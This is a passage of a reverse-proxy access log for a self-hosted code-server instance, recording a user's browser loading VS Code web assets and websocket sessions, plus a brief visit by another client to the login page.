(KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://code.profibot.hu/?folder=/home/coder" +[23/Jan/2026:06:35:13 +0000] - 404 404 - GET https code.profibot.hu "/stable-ba588b47099b31ad9734ef05534e9813bae22c64/static/node_modules/vsda/rust/web/vsda.js" [Client 84.1.26.27] [Length 23] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://code.profibot.hu/?folder=/home/coder" +[23/Jan/2026:06:35:14 +0000] - 200 200 - GET https code.profibot.hu "/stable-ba588b47099b31ad9734ef05534e9813bae22c64/static/out/media/letterpress-light.svg" [Client 84.1.26.27] [Length 299] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://code.profibot.hu/stable-ba588b47099b31ad9734ef05534e9813bae22c64/static/out/vs/code/browser/workbench/workbench.css" +[23/Jan/2026:06:35:14 +0000] - 200 200 - GET https code.profibot.hu "/update/check" [Client 84.1.26.27] [Length 80] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://code.profibot.hu/?folder=/home/coder" +[23/Jan/2026:06:35:14 +0000] - 200 200 - GET https code.profibot.hu "/stable-ba588b47099b31ad9734ef05534e9813bae22c64/static/out/vs/workbench/services/extensions/worker/webWorkerExtensionHostIframe.html?&vscodeWebWorkerExtHostId=d7a92dfb-c9c4-43c1-8c44-63f6cd2bccf7" [Client 84.1.26.27] [Length 2196] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://code.profibot.hu/?folder=/home/coder" +[23/Jan/2026:06:35:15 +0000] - 200 200 - GET https code.profibot.hu "/stable-ba588b47099b31ad9734ef05534e9813bae22c64/vscode-remote-resource?path=%2Fusr%2Flib%2Fcode-server%2Flib%2Fvscode%2Fextensions%2Ftheme-seti%2Ficons%2Fvs-seti-icon-theme.json&tkn=" [Client 84.1.26.27] [Length 7568] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://code.profibot.hu/?folder=/home/coder" +[23/Jan/2026:06:35:15 +0000] - 304 304 - GET https code.profibot.hu "/_static/src/browser/media/templates.png" [Client 84.1.26.27] [Length 0] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://code.profibot.hu/?folder=/home/coder" +[23/Jan/2026:06:35:15 +0000] - 200 200 - GET https code.profibot.hu "/stable-ba588b47099b31ad9734ef05534e9813bae22c64/vscode-remote-resource?path=%2Fusr%2Flib%2Fcode-server%2Flib%2Fvscode%2Fextensions%2Ftheme-defaults%2Fthemes%2Flight_modern.json&tkn=" [Client 84.1.26.27] [Length 1393] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://code.profibot.hu/?folder=/home/coder" +[23/Jan/2026:06:35:15 +0000] - 200 200 - GET https code.profibot.hu "/stable-ba588b47099b31ad9734ef05534e9813bae22c64/vscode-remote-resource?path=%2Fusr%2Flib%2Fcode-server%2Flib%2Fvscode%2Fextensions%2Ftheme-seti%2Ficons%2Fseti.woff&tkn=" [Client 84.1.26.27] [Length 37336] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://code.profibot.hu/?folder=/home/coder" +[23/Jan/2026:06:35:15 +0000] - 200 200 - GET https code.profibot.hu "/stable-ba588b47099b31ad9734ef05534e9813bae22c64/vscode-remote-resource?path=%2Fusr%2Flib%2Fcode-server%2Flib%2Fvscode%2Fextensions%2Ftheme-defaults%2Fthemes%2Flight_plus.json&tkn=" [Client 84.1.26.27] [Length 1034] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://code.profibot.hu/?folder=/home/coder" +[23/Jan/2026:06:35:15 +0000] - 200 200 - GET https code.profibot.hu "/stable-ba588b47099b31ad9734ef05534e9813bae22c64/vscode-remote-resource?path=%2Fusr%2Flib%2Fcode-server%2Flib%2Fvscode%2Fextensions%2Ftheme-defaults%2Fthemes%2Flight_vs.json&tkn=" [Client 84.1.26.27] [Length 1849] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://code.profibot.hu/?folder=/home/coder" +[23/Jan/2026:06:35:17 +0000] - 304 304 - GET https code.profibot.hu "/_static/out/browser/serviceWorker.js" [Client 84.1.26.27] [Length 0] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://code.profibot.hu/_static/out/browser/serviceWorker.js" +[23/Jan/2026:06:42:30 +0000] - 404 404 - GET https code.profibot.hu "/stable-ba588b47099b31ad9734ef05534e9813bae22c64/static/node_modules/@xterm/addon-ligatures/lib/addon-ligatures.js" [Client 84.1.26.27] [Length 23] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://code.profibot.hu/?folder=/home/coder" +[23/Jan/2026:06:49:37 +0000] - 200 200 - GET https code.profibot.hu "/stable-ba588b47099b31ad9734ef05534e9813bae22c64/vscode-remote-resource?path=%2Fusr%2Flib%2Fcode-server%2Flib%2Fvscode%2Fextensions%2Fyaml%2Flanguage-configuration.json&tkn=" [Client 84.1.26.27] [Length 250] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://code.profibot.hu/?folder=/home/coder" +[23/Jan/2026:06:49:37 +0000] - 200 200 - GET https code.profibot.hu "/stable-ba588b47099b31ad9734ef05534e9813bae22c64/vscode-remote-resource?path=%2Fusr%2Flib%2Fcode-server%2Flib%2Fvscode%2Fextensions%2Fyaml%2Fsyntaxes%2Fyaml.tmLanguage.json&tkn=" [Client 84.1.26.27] [Length 1158] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://code.profibot.hu/?folder=/home/coder" +[23/Jan/2026:06:49:37 +0000] - 200 200 - GET https code.profibot.hu "/stable-ba588b47099b31ad9734ef05534e9813bae22c64/vscode-remote-resource?path=%2Fusr%2Flib%2Fcode-server%2Flib%2Fvscode%2Fextensions%2Fyaml%2Fsyntaxes%2Fyaml-embedded.tmLanguage.json&tkn=" [Client 84.1.26.27] [Length 2380] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://code.profibot.hu/?folder=/home/coder" +[23/Jan/2026:06:49:37 +0000] - 200 200 - GET https code.profibot.hu "/stable-ba588b47099b31ad9734ef05534e9813bae22c64/vscode-remote-resource?path=%2Fusr%2Flib%2Fcode-server%2Flib%2Fvscode%2Fextensions%2Fyaml%2Fsyntaxes%2Fyaml-1.2.tmLanguage.json&tkn=" [Client 84.1.26.27] [Length 5088] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://code.profibot.hu/?folder=/home/coder" +[23/Jan/2026:06:49:37 +0000] - 200 200 - GET https code.profibot.hu "/stable-ba588b47099b31ad9734ef05534e9813bae22c64/vscode-remote-resource?path=%2Fusr%2Flib%2Fcode-server%2Flib%2Fvscode%2Fextensions%2Fyaml%2Fsyntaxes%2Fyaml-1.3.tmLanguage.json&tkn=" [Client 84.1.26.27] [Length 675] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://code.profibot.hu/?folder=/home/coder" +[23/Jan/2026:06:49:37 +0000] - 200 200 - GET https code.profibot.hu "/stable-ba588b47099b31ad9734ef05534e9813bae22c64/vscode-remote-resource?path=%2Fusr%2Flib%2Fcode-server%2Flib%2Fvscode%2Fextensions%2Fyaml%2Fsyntaxes%2Fyaml-1.1.tmLanguage.json&tkn=" [Client 84.1.26.27] [Length 4996] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://code.profibot.hu/?folder=/home/coder" +[23/Jan/2026:06:49:37 +0000] - 200 200 - GET https code.profibot.hu "/stable-ba588b47099b31ad9734ef05534e9813bae22c64/vscode-remote-resource?path=%2Fusr%2Flib%2Fcode-server%2Flib%2Fvscode%2Fextensions%2Fyaml%2Fsyntaxes%2Fyaml-1.0.tmLanguage.json&tkn=" [Client 84.1.26.27] [Length 3758] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://code.profibot.hu/?folder=/home/coder" +[23/Jan/2026:07:01:32 +0000] - 200 200 - GET https code.profibot.hu "/stable-ba588b47099b31ad9734ef05534e9813bae22c64/vscode-remote-resource?path=%2Fusr%2Flib%2Fcode-server%2Flib%2Fvscode%2Fextensions%2Fbat%2Fsnippets%2Fbatchfile.code-snippets&tkn=" [Client 84.1.26.27] [Length 114] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://code.profibot.hu/?folder=/home/coder" +[23/Jan/2026:07:01:32 +0000] - 200 200 - GET https code.profibot.hu "/stable-ba588b47099b31ad9734ef05534e9813bae22c64/vscode-remote-resource?path=%2Fusr%2Flib%2Fcode-server%2Flib%2Fvscode%2Fextensions%2Fcsharp%2Fsnippets%2Fcsharp.code-snippets&tkn=" [Client 84.1.26.27] [Length 114] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://code.profibot.hu/?folder=/home/coder" +[23/Jan/2026:07:01:32 +0000] - 200 200 - GET https code.profibot.hu "/stable-ba588b47099b31ad9734ef05534e9813bae22c64/vscode-remote-resource?path=%2Fusr%2Flib%2Fcode-server%2Flib%2Fvscode%2Fextensions%2Fcpp%2Fsnippets%2Fcpp.code-snippets&tkn=" [Client 84.1.26.27] [Length 120] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://code.profibot.hu/?folder=/home/coder" +[23/Jan/2026:07:01:32 +0000] - 200 200 - GET https code.profibot.hu "/stable-ba588b47099b31ad9734ef05534e9813bae22c64/vscode-remote-resource?path=%2Fusr%2Flib%2Fcode-server%2Flib%2Fvscode%2Fextensions%2Fcpp%2Fsnippets%2Fc.code-snippets&tkn=" [Client 84.1.26.27] [Length 120] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://code.profibot.hu/?folder=/home/coder" +[23/Jan/2026:07:01:32 +0000] - 200 200 - GET https code.profibot.hu "/stable-ba588b47099b31ad9734ef05534e9813bae22c64/vscode-remote-resource?path=%2Fusr%2Flib%2Fcode-server%2Flib%2Fvscode%2Fextensions%2Ffsharp%2Fsnippets%2Ffsharp.code-snippets&tkn=" [Client 84.1.26.27] [Length 116] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://code.profibot.hu/?folder=/home/coder" +[23/Jan/2026:07:01:32 +0000] - 200 200 - GET https code.profibot.hu "/stable-ba588b47099b31ad9734ef05534e9813bae22c64/vscode-remote-resource?path=%2Fusr%2Flib%2Fcode-server%2Flib%2Fvscode%2Fextensions%2Fcoffeescript%2Fsnippets%2Fcoffeescript.code-snippets&tkn=" [Client 84.1.26.27] [Length 113] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://code.profibot.hu/?folder=/home/coder" +[23/Jan/2026:07:01:32 +0000] - 200 200 - GET https code.profibot.hu "/stable-ba588b47099b31ad9734ef05534e9813bae22c64/vscode-remote-resource?path=%2Fusr%2Flib%2Fcode-server%2Flib%2Fvscode%2Fextensions%2Fjava%2Fsnippets%2Fjava.code-snippets&tkn=" [Client 84.1.26.27] [Length 114] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://code.profibot.hu/?folder=/home/coder" +[23/Jan/2026:07:01:32 +0000] - 200 200 - GET https code.profibot.hu "/stable-ba588b47099b31ad9734ef05534e9813bae22c64/vscode-remote-resource?path=%2Fusr%2Flib%2Fcode-server%2Flib%2Fvscode%2Fextensions%2Fhtml%2Fsnippets%2Fhtml.code-snippets&tkn=" [Client 84.1.26.27] [Length 166] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://code.profibot.hu/?folder=/home/coder" +[23/Jan/2026:07:01:32 +0000] - 200 200 - GET https code.profibot.hu "/stable-ba588b47099b31ad9734ef05534e9813bae22c64/vscode-remote-resource?path=%2Fusr%2Flib%2Fcode-server%2Flib%2Fvscode%2Fextensions%2Fjavascript%2Fsnippets%2Fjavascript.code-snippets&tkn=" [Client 84.1.26.27] [Length 1095] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://code.profibot.hu/?folder=/home/coder" +[23/Jan/2026:07:01:32 +0000] - 200 200 - GET https code.profibot.hu "/stable-ba588b47099b31ad9734ef05534e9813bae22c64/vscode-remote-resource?path=%2Fusr%2Flib%2Fcode-server%2Flib%2Fvscode%2Fextensions%2Fgroovy%2Fsnippets%2Fgroovy.code-snippets&tkn=" [Client 84.1.26.27] [Length 1138] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://code.profibot.hu/?folder=/home/coder" +[23/Jan/2026:07:01:32 +0000] - 200 200 - GET https code.profibot.hu "/stable-ba588b47099b31ad9734ef05534e9813bae22c64/vscode-remote-resource?path=%2Fusr%2Flib%2Fcode-server%2Flib%2Fvscode%2Fextensions%2Fmarkdown-basics%2Fsnippets%2Fmarkdown.code-snippets&tkn=" [Client 84.1.26.27] [Length 585] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://code.profibot.hu/?folder=/home/coder" +[23/Jan/2026:07:01:33 +0000] - 200 200 - GET https code.profibot.hu "/stable-ba588b47099b31ad9734ef05534e9813bae22c64/vscode-remote-resource?path=%2Fusr%2Flib%2Fcode-server%2Flib%2Fvscode%2Fextensions%2Fphp%2Fsnippets%2Fphp.code-snippets&tkn=" [Client 84.1.26.27] [Length 2095] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://code.profibot.hu/?folder=/home/coder" +[23/Jan/2026:07:01:33 +0000] - 200 200 - GET https code.profibot.hu "/stable-ba588b47099b31ad9734ef05534e9813bae22c64/vscode-remote-resource?path=%2Fusr%2Flib%2Fcode-server%2Flib%2Fvscode%2Fextensions%2Ftypescript-basics%2Fsnippets%2Ftypescript.code-snippets&tkn=" [Client 84.1.26.27] [Length 1332] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://code.profibot.hu/?folder=/home/coder" +[23/Jan/2026:07:01:33 +0000] - 200 200 - GET https code.profibot.hu "/stable-ba588b47099b31ad9734ef05534e9813bae22c64/vscode-remote-resource?path=%2Fusr%2Flib%2Fcode-server%2Flib%2Fvscode%2Fextensions%2Fswift%2Fsnippets%2Fswift.code-snippets&tkn=" [Client 84.1.26.27] [Length 581] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://code.profibot.hu/?folder=/home/coder" +[23/Jan/2026:07:01:33 +0000] - 200 200 - GET https code.profibot.hu "/stable-ba588b47099b31ad9734ef05534e9813bae22c64/vscode-remote-resource?path=%2Fusr%2Flib%2Fcode-server%2Flib%2Fvscode%2Fextensions%2Fvb%2Fsnippets%2Fvb.code-snippets&tkn=" [Client 84.1.26.27] [Length 475] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://code.profibot.hu/?folder=/home/coder" +[23/Jan/2026:07:06:22 +0000] - 200 200 - GET https code.profibot.hu "/stable-ba588b47099b31ad9734ef05534e9813bae22c64/vscode-remote-resource?path=%2Fusr%2Flib%2Fcode-server%2Flib%2Fvscode%2Fextensions%2Fpython%2Flanguage-configuration.json&tkn=" [Client 84.1.26.27] [Length 387] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://code.profibot.hu/?folder=/home/coder" +[23/Jan/2026:07:06:22 +0000] - 200 200 - GET https code.profibot.hu "/stable-ba588b47099b31ad9734ef05534e9813bae22c64/vscode-remote-resource?path=%2Fusr%2Flib%2Fcode-server%2Flib%2Fvscode%2Fextensions%2Fpython%2Fsyntaxes%2FMagicPython.tmLanguage.json&tkn=" [Client 84.1.26.27] [Length 12064] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://code.profibot.hu/?folder=/home/coder" +[23/Jan/2026:07:18:46 +0000] - 101 101 - GET https code.profibot.hu "/stable-ba588b47099b31ad9734ef05534e9813bae22c64?reconnectionToken=3bbf4bc4-a999-47af-b164-32be9143784d&reconnection=false&skipWebSocketFrames=false" [Client 84.1.26.27] [Length 45152] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "-" +[23/Jan/2026:07:18:47 +0000] - 101 101 - GET https code.profibot.hu "/stable-ba588b47099b31ad9734ef05534e9813bae22c64?reconnectionToken=3bbf4bc4-a999-47af-b164-32be9143784d&reconnection=true&skipWebSocketFrames=false" [Client 84.1.26.27] [Length 174] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "-" +[23/Jan/2026:07:26:51 +0000] - 200 200 - GET https code.profibot.hu "/stable-ba588b47099b31ad9734ef05534e9813bae22c64/vscode-remote-resource?path=%2Fusr%2Flib%2Fcode-server%2Flib%2Fvscode%2Fextensions%2Fshellscript%2Fsyntaxes%2Fshell-unix-bash.tmLanguage.json&tkn=" [Client 84.1.26.27] [Length 6899] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://code.profibot.hu/?folder=/home/coder" +[23/Jan/2026:07:26:51 +0000] - 200 200 - GET https code.profibot.hu "/stable-ba588b47099b31ad9734ef05534e9813bae22c64/vscode-remote-resource?path=%2Fusr%2Flib%2Fcode-server%2Flib%2Fvscode%2Fextensions%2Fshellscript%2Flanguage-configuration.json&tkn=" [Client 84.1.26.27] [Length 211] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://code.profibot.hu/?folder=/home/coder" +[23/Jan/2026:07:27:32 +0000] - 200 200 - GET https code.profibot.hu "/_static/src/browser/media/favicon-dark-support.svg" [Client 84.1.26.27] [Length 685] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "-" +[23/Jan/2026:07:48:50 +0000] - 101 101 - GET https code.profibot.hu "/stable-ba588b47099b31ad9734ef05534e9813bae22c64?reconnectionToken=e2e52b10-66f6-401b-b593-154a1fb7e370&reconnection=false&skipWebSocketFrames=false" [Client 84.1.26.27] [Length 28628] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "-" +[23/Jan/2026:07:48:51 +0000] - 101 101 - GET https code.profibot.hu "/stable-ba588b47099b31ad9734ef05534e9813bae22c64?reconnectionToken=e2e52b10-66f6-401b-b593-154a1fb7e370&reconnection=true&skipWebSocketFrames=false" [Client 84.1.26.27] [Length 172] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "-" +[23/Jan/2026:08:24:42 +0000] - 302 302 - GET http code.profibot.hu "/" [Client 138.197.144.104] [Length 36] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/142.0.0.0 Safari/537.36" "-" +[23/Jan/2026:08:24:42 +0000] - 200 200 - GET http code.profibot.hu "/login" [Client 138.197.144.104] [Length 1038] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/142.0.0.0 Safari/537.36" "-" +[23/Jan/2026:08:24:43 +0000] - 200 200 - GET http code.profibot.hu "/_static/src/browser/media/favicon-dark-support.svg" [Client 138.197.144.104] [Length 685] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/142.0.0.0 Safari/537.36" "http://code.profibot.hu/login" +[23/Jan/2026:08:24:43 +0000] - 302 302 - GET https code.profibot.hu "/" [Client 138.197.144.104] [Length 36] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (X11; Linux x86_64; rv:142.0) Gecko/20100101 Firefox/142.0" "-" +[23/Jan/2026:08:24:47 +0000] - 200 200 - GET https code.profibot.hu "/login" [Client 138.197.144.104] [Length 1038] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (X11; Linux x86_64; rv:142.0) Gecko/20100101 Firefox/142.0" "-" +[23/Jan/2026:08:24:47 +0000] - 200 200 - GET https code.profibot.hu "/_static/src/browser/media/favicon-dark-support.svg" [Client 138.197.144.104] [Length 685] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (X11; Linux x86_64; rv:142.0) Gecko/20100101 Firefox/142.0" "https://code.profibot.hu/login" +[23/Jan/2026:08:27:43 +0000] - 200 200 - GET https code.profibot.hu "/stable-ba588b47099b31ad9734ef05534e9813bae22c64/static/out/vs/workbench/services/languageDetection/browser/languageDetectionWebWorkerMain.js" [Client 84.1.26.27] [Length 48844] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "-" +[23/Jan/2026:08:28:32 +0000] - 200 200 - GET https code.profibot.hu "/stable-ba588b47099b31ad9734ef05534e9813bae22c64/static/node_modules/@vscode/vscode-languagedetection/dist/lib/index.js" [Client 84.1.26.27] [Length 135584] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://code.profibot.hu/stable-ba588b47099b31ad9734ef05534e9813bae22c64/static/out/vs/workbench/services/languageDetection/browser/languageDetectionWebWorkerMain.js" +[23/Jan/2026:08:28:32 +0000] - 200 200 - GET https code.profibot.hu "/stable-ba588b47099b31ad9734ef05534e9813bae22c64/static/node_modules/@vscode/vscode-languagedetection/model/model.json" [Client 84.1.26.27] [Length 13644] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "-" +[23/Jan/2026:08:28:32 +0000] - 200 200 - GET https code.profibot.hu "/stable-ba588b47099b31ad9734ef05534e9813bae22c64/static/node_modules/@vscode/vscode-languagedetection/model/group1-shard1of1.bin" [Client 84.1.26.27] [Length 541822] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "-" +[23/Jan/2026:08:28:33 +0000] - 200 200 - GET https code.profibot.hu "/stable-ba588b47099b31ad9734ef05534e9813bae22c64/vscode-remote-resource?path=%2Fusr%2Flib%2Fcode-server%2Flib%2Fvscode%2Fextensions%2Fini%2Fini.language-configuration.json&tkn=" [Client 84.1.26.27] [Length 160] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://code.profibot.hu/?folder=/home/coder" +[23/Jan/2026:08:28:33 +0000] - 200 200 - GET https code.profibot.hu "/stable-ba588b47099b31ad9734ef05534e9813bae22c64/vscode-remote-resource?path=%2Fusr%2Flib%2Fcode-server%2Flib%2Fvscode%2Fextensions%2Fini%2Fsyntaxes%2Fini.tmLanguage.json&tkn=" [Client 84.1.26.27] [Length 656] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://code.profibot.hu/?folder=/home/coder" +[23/Jan/2026:12:35:14 +0000] - 304 304 - GET https code.profibot.hu "/update/check" [Client 84.1.26.27] [Length 0] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://code.profibot.hu/?folder=/home/coder" +[23/Jan/2026:13:20:40 +0000] - 101 101 - GET https code.profibot.hu "/stable-ba588b47099b31ad9734ef05534e9813bae22c64?reconnectionToken=4baccfb0-090f-4614-a951-303a12671c7e&reconnection=false&skipWebSocketFrames=false" [Client 84.1.26.27] [Length 1108861] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "-" +[23/Jan/2026:14:51:36 +0000] - 101 101 - GET https code.profibot.hu "/stable-ba588b47099b31ad9734ef05534e9813bae22c64?reconnectionToken=4baccfb0-090f-4614-a951-303a12671c7e&reconnection=true&skipWebSocketFrames=false" [Client 84.1.26.27] [Length 8349] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "-" +[23/Jan/2026:14:53:24 +0000] - 302 302 - GET https code.profibot.hu "/" [Client 84.1.26.27] [Length 50] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "-" +[23/Jan/2026:14:53:25 +0000] - 200 200 - GET https code.profibot.hu "/?folder=/home/coder" [Client 84.1.26.27] [Length 1387] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "-" +[23/Jan/2026:14:53:25 +0000] - 304 304 - GET https 